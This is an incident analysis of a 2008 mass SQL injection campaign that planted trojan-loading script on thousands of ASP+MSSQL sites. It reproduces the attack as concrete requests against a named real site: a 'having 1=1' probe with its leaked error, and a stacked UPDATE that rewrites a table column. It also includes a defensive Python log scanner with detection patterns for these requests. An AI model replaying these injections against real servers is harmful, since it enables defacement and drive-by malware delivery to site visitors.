Analysis of attacks on tens of thousands of websites, such as Trend Micro


BY: rayh4c.cn

I. How I first found news and reports of this attack on the Internet

http://www.2cto.com/OS/200803/24504.html

http://www.nsfocus.net/news/6697

http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

Related hacked pages can be found with a Google search:

http://www.google.cn/search?hl=zh-CN&q=site%3Atrendmicro.com++www.2117966.net+fuckjp.js&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f

The Trend Micro pages have been injected with a Trojan that loads http://www.2117966.net/fuckjp.js.

II. Searching directly for the injected JS

http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net+fuckjp.js&meta=&aq=f

About 12,500 matching results were returned, and every one of them is a page into which this JavaScript Trojan has been inserted.

Analysis shows that the hacked pages share the following features:

1. Every affected website runs an ASP + MSSQL architecture.

2. Every modified page has a SQL injection vulnerability.

III. Take one of the infected pages and reproduce the SQL injection attack:

1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?Person=5162

This link has an obvious SQL injection. Appending the statement "having 1=1" to the Person parameter makes the page's error message expose the table name at the injection point (Coordinator) and a column name (ShCoordinatorSurame).

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?Person=5162 having 1=1

------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'Coordinator.ShCoordinatorSurame' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
------------------

2. Use the exposed table and column names to overwrite the column's content on the current page; the new content is the JavaScript code that mounts the Trojan.

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?Person=5162;update Coordinator set ShCoordinatorSurame= where 1=1 --

This rewrites the ShCoordinatorSurame column of the Coordinator table; because the condition 1=1 is always true, every row that the current page queries is modified, and the page then renders the injected content.

Any page with such a SQL injection point can therefore have a Trojan mounted on it directly.
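As an added example from the defender's side (not part of the original write-up), the following Python script flags the two request shapes described above, the "having 1=1" probe and the stacked "update ... where 1=1" rewrite, in IIS W3C log lines. The log lines, their field order, the path and the PLACEHOLDER value are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not from the original post), field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status. The third line
# mirrors the stacked UPDATE from the write-up with the injected value replaced
# by a placeholder.
SAMPLE_LOG = """\
2008-03-12 10:01:02 192.0.2.10 GET /asp/StrPersonOverview.asp Person=5162 200
2008-03-12 10:01:05 192.0.2.10 GET /asp/StrPersonOverview.asp Person=5162+having+1%3D1 500
2008-03-12 10:01:09 192.0.2.10 GET /asp/StrPersonOverview.asp Person=5162;update+Coordinator+set+ShCoordinatorSurame%3D%27PLACEHOLDER%27+where+1%3D1-- 200
2008-03-12 10:02:00 198.51.100.7 GET /index.asp - 200
"""

# (rule name, regex applied to the URL-decoded query string)
RULES = [
    # "having 1=1" probe that makes SQL Server name the table and column
    ("having-probe", re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I)),
    # stacked query rewriting one column for every row of a table
    ("stacked-update", re.compile(
        r";\s*update\s+\w+\s+set\s+\w+\s*=.*\bwhere\s+1\s*=\s*1\b", re.I)),
    # injected value carrying script markup
    ("script-in-query", re.compile(r"<\s*script\b", re.I)),
]

def decode_query(raw):
    """URL-decode until stable so double-encoded payloads are normalized too."""
    prev, cur = None, raw
    while prev != cur:
        prev, cur = cur, unquote_plus(cur)
    return cur

def scan_line(line):
    """Return (client_ip, uri_stem, [matched rule names]) for one log line."""
    fields = line.split(" ")
    if len(fields) < 7:
        return None
    ip, stem, query = fields[2], fields[4], fields[5]
    hits = [name for name, rx in RULES if rx.search(decode_query(query))]
    return ip, stem, hits

def scan_log(text):
    """Return only the entries that matched at least one rule."""
    alerts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):  # skip W3C directive lines
            continue
        result = scan_line(line)
        if result and result[2]:
            alerts.append(result)
    return alerts
```

Running scan_log(SAMPLE_LOG) reports the second and third lines, both from the same client, which is the probe-then-rewrite sequence the write-up reproduces.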

IV. Summary

This large-scale attack must have been automated:

1. SQL injection vulnerabilities on tens of thousands of websites were collected in batches using advanced scanning techniques.

2. The injection and the Trojan mounting were then carried out automatically against each vulnerable site.

Although the SQL injection vulnerability is very old, the attackers' ability to attack, and mount Trojans on, the HiChina websites within a single day is remarkable, and even security companies such as Trend Micro were not spared.
